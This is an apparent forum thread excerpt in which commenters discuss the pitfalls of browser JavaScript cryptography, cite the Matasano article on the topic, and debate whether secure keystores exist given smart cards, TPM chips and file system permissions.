None of this is Javascript's fault, for what it's worth. But I certainly don't expect Javascript to make it any easier to write correct code, quite the contrary.
I think the main reason people keep wanting to do this is that web developers would like to work on this problem but don't have immediately applicable skills. Using existing crypto libraries well, much less engineering new cryptosystems, is going to require a great deal of learning on most of their parts, at least as daunting as becoming a good front-end developer in the first place. It's the difference between being able to code and being able to write a high-quality optimizing compiler, for instance. With study and hard work you can use the fruits of the crypto community well... but you have to start by realizing where you are starting from. In-browser javascript isn't just another programming language and runtime completely akin to C and the C runtime. The Matasano article does a great job of describing why.
No such thing as a secure keystore? He needs to look harder. Aside from tamper-proof hardware... which exists in smart cards and TPM chips... most operating systems use file system ACLs. Yes, running as "root" means you can get the keys... you have to protect them...
You are right, and the fact that people are just dismissing you out of hand is frightening. It shows a lack of even the interest to understand how off-base they are.
The Matasano post is here:
http://matasano.com/articles/javascript-cryptography/